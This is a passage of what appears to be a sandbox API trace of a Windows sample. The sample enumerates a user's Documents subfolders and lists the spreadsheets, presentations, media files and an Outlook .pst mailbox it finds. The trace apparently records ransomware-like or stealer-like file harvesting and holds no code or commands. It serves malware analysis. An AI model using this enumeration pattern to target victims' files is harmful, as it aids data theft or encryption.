[0228.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba38 | out: hHeap=0x620000) returned 1 [0228.796] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3576ea60, ftCreationTime.dwHighDateTime=0x1d5b9e6, ftLastAccessTime.dwLowDateTime=0xbbf91390, ftLastAccessTime.dwHighDateTime=0x1d5bb23, ftLastWriteTime.dwLowDateTime=0xbbf91390, ftLastWriteTime.dwHighDateTime=0x1d5bb23, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.796] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fe92b10, ftCreationTime.dwHighDateTime=0x1d5bdbe, ftLastAccessTime.dwLowDateTime=0x8cb6bc70, ftLastAccessTime.dwHighDateTime=0x1d5bfcb, ftLastWriteTime.dwLowDateTime=0x8cb6bc70, ftLastWriteTime.dwHighDateTime=0x1d5bfcb, nFileSizeHigh=0x0, nFileSizeLow=0x73a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3cSlbbowxq5ttWRL0.mp3", cAlternateFileName="3CSLBB~1.MP3")) returned 1 [0228.796] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8cacd30, ftCreationTime.dwHighDateTime=0x1d5c21e, ftLastAccessTime.dwLowDateTime=0x835bc2b0, ftLastAccessTime.dwHighDateTime=0x1d5c395, ftLastWriteTime.dwLowDateTime=0x835bc2b0, ftLastWriteTime.dwHighDateTime=0x1d5c395, nFileSizeHigh=0x0, nFileSizeLow=0xe1f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4 FWN8QfMEos_mmG9-wb.jpg", cAlternateFileName="4FWN8Q~1.JPG")) returned 1 [0228.796] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9761e00, ftCreationTime.dwHighDateTime=0x1d5bd60, ftLastAccessTime.dwLowDateTime=0xfcfb5c90, ftLastAccessTime.dwHighDateTime=0x1d5b9f7, ftLastWriteTime.dwLowDateTime=0xfcfb5c90, ftLastWriteTime.dwHighDateTime=0x1d5b9f7, nFileSizeHigh=0x0, nFileSizeLow=0x17571, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DxyCVfw3NYqWMFEr.png", cAlternateFileName="DXYCVF~1.PNG")) returned 1 [0228.796] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1e3a6d0, ftCreationTime.dwHighDateTime=0x1d5ba34, ftLastAccessTime.dwLowDateTime=0xdf4774d0, ftLastAccessTime.dwHighDateTime=0x1d5c380, ftLastWriteTime.dwLowDateTime=0xdf4774d0, ftLastWriteTime.dwHighDateTime=0x1d5c380, nFileSizeHigh=0x0, nFileSizeLow=0xa4eb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GB6gNr7G.m4a", cAlternateFileName="")) returned 1 [0228.796] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5ff4680, ftCreationTime.dwHighDateTime=0x1d5c4b6, ftLastAccessTime.dwLowDateTime=0x1289cdc0, ftLastAccessTime.dwHighDateTime=0x1d5bcd3, ftLastWriteTime.dwLowDateTime=0x1289cdc0, ftLastWriteTime.dwHighDateTime=0x1d5bcd3, nFileSizeHigh=0x0, nFileSizeLow=0x18d84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p-DM0J8.bmp", cAlternateFileName="")) returned 1 [0228.796] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5ff4680, ftCreationTime.dwHighDateTime=0x1d5c4b6, ftLastAccessTime.dwLowDateTime=0x1289cdc0, ftLastAccessTime.dwHighDateTime=0x1d5bcd3, ftLastWriteTime.dwLowDateTime=0x1289cdc0, ftLastWriteTime.dwHighDateTime=0x1d5bcd3, nFileSizeHigh=0x0, nFileSizeLow=0x18d84, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p-DM0J8.bmp", cAlternateFileName="")) returned 0 [0228.796] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7baa0 | out: hHeap=0x620000) returned 1 [0228.797] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.797] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\") returned="Ji_heo\\" [0228.797] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0228.797] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.797] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.797] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.797] PathFindFileNameW (pszPath="") returned="" [0228.797] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcff48890, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x18912570, ftLastAccessTime.dwHighDateTime=0x1d5bef8, ftLastWriteTime.dwLowDateTime=0x18912570, ftLastWriteTime.dwHighDateTime=0x1d5bef8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0228.799] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcff48890, ftCreationTime.dwHighDateTime=0x1d5baa4, ftLastAccessTime.dwLowDateTime=0x18912570, ftLastAccessTime.dwHighDateTime=0x1d5bef8, ftLastWriteTime.dwLowDateTime=0x18912570, ftLastWriteTime.dwHighDateTime=0x1d5bef8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.799] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd30875d0, ftCreationTime.dwHighDateTime=0x1d5b9d4, ftLastAccessTime.dwLowDateTime=0x1b4ac430, ftLastAccessTime.dwHighDateTime=0x1d5ba37, ftLastWriteTime.dwLowDateTime=0x1b4ac430, ftLastWriteTime.dwHighDateTime=0x1d5ba37, nFileSizeHigh=0x0, nFileSizeLow=0x1b3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dF-4SRgpmpphXDcG.xlsx", cAlternateFileName="DF-4SR~1.XLS")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3daee60, ftCreationTime.dwHighDateTime=0x1d5bdfc, ftLastAccessTime.dwLowDateTime=0xe17743b0, ftLastAccessTime.dwHighDateTime=0x1d5b5b7, ftLastWriteTime.dwLowDateTime=0xe17743b0, ftLastWriteTime.dwHighDateTime=0x1d5b5b7, nFileSizeHigh=0x0, nFileSizeLow=0x9a87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gTLi.odp", cAlternateFileName="")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x175d9200, ftCreationTime.dwHighDateTime=0x1d5c16a, ftLastAccessTime.dwLowDateTime=0xf955a70, ftLastAccessTime.dwHighDateTime=0x1d5b9f5, ftLastWriteTime.dwLowDateTime=0xf955a70, ftLastWriteTime.dwHighDateTime=0x1d5b9f5, nFileSizeHigh=0x0, nFileSizeLow=0x47fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KxCbm.odp", cAlternateFileName="")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17706b80, ftCreationTime.dwHighDateTime=0x1d5b90b, ftLastAccessTime.dwLowDateTime=0x6fae2f80, ftLastAccessTime.dwHighDateTime=0x1d5c1b7, ftLastWriteTime.dwLowDateTime=0x6fae2f80, ftLastWriteTime.dwHighDateTime=0x1d5c1b7, nFileSizeHigh=0x0, nFileSizeLow=0x2a94, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="n5R3r3ah.xls", cAlternateFileName="")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd040330, ftCreationTime.dwHighDateTime=0x1d5b969, ftLastAccessTime.dwLowDateTime=0x7450b0d0, ftLastAccessTime.dwHighDateTime=0x1d5bba9, ftLastWriteTime.dwLowDateTime=0x7450b0d0, ftLastWriteTime.dwHighDateTime=0x1d5bba9, nFileSizeHigh=0x0, nFileSizeLow=0x436b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qrfDtUiJ12.pptx", cAlternateFileName="QRFDTU~1.PPT")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x295f9520, ftCreationTime.dwHighDateTime=0x1d5b8e1, ftLastAccessTime.dwLowDateTime=0xeedcee50, ftLastAccessTime.dwHighDateTime=0x1d5bb03, ftLastWriteTime.dwLowDateTime=0xeedcee50, ftLastWriteTime.dwHighDateTime=0x1d5bb03, nFileSizeHigh=0x0, nFileSizeLow=0xe0c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qWv5zMVx3eF_fs53v.odp", cAlternateFileName="QWV5ZM~1.ODP")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea73370, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0xb5fd4fb0, ftLastAccessTime.dwHighDateTime=0x1d5b871, ftLastWriteTime.dwLowDateTime=0xb5fd4fb0, ftLastWriteTime.dwHighDateTime=0x1d5b871, nFileSizeHigh=0x0, nFileSizeLow=0x7148, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xdvtmhR5usy.pdf", cAlternateFileName="XDVTMH~1.PDF")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 1 [0228.800] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 0 [0228.800] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7baa0 | out: hHeap=0x620000) returned 1 [0228.801] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0228.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0228.801] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.801] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.801] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.801] PathFindFileNameW (pszPath="") returned="" [0228.801] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 0xffffffff [0228.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a8a8 | out: hHeap=0x620000) returned 1 [0228.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.801] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0228.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0228.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.802] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.802] PathFindFileNameW (pszPath="") returned="" [0228.802] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf5dc8a70, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x35219d30, ftLastAccessTime.dwHighDateTime=0x1d5b5ae, ftLastWriteTime.dwLowDateTime=0x35219d30, ftLastWriteTime.dwHighDateTime=0x1d5b5ae, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZLJLwY4 p8u", cAlternateFileName="ZLJLWY~1")) returned 0xffffffff [0228.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a8a8 | out: hHeap=0x620000) returned 1 [0228.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.802] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0228.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0228.802] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.802] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.802] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.802] PathFindFileNameW (pszPath="") returned="" [0228.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a8a8 | out: hHeap=0x620000) returned 1 [0228.804] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.804] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0228.804] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0228.804] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0228.804] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0228.804] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.804] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0228.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0228.804] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.804] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.804] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.804] PathFindFileNameW (pszPath="") returned="" [0228.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0228.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0228.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.805] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0228.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0228.805] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0228.805] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0228.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.805] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.805] PathFindFileNameW (pszPath="") returned="" [0228.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c44b0 | out: hHeap=0x620000) returned 1 [0228.806] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.806] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0228.806] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0228.806] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0228.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4438 | out: hHeap=0x620000) returned 1 [0228.806] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.806] PathFindFileNameW 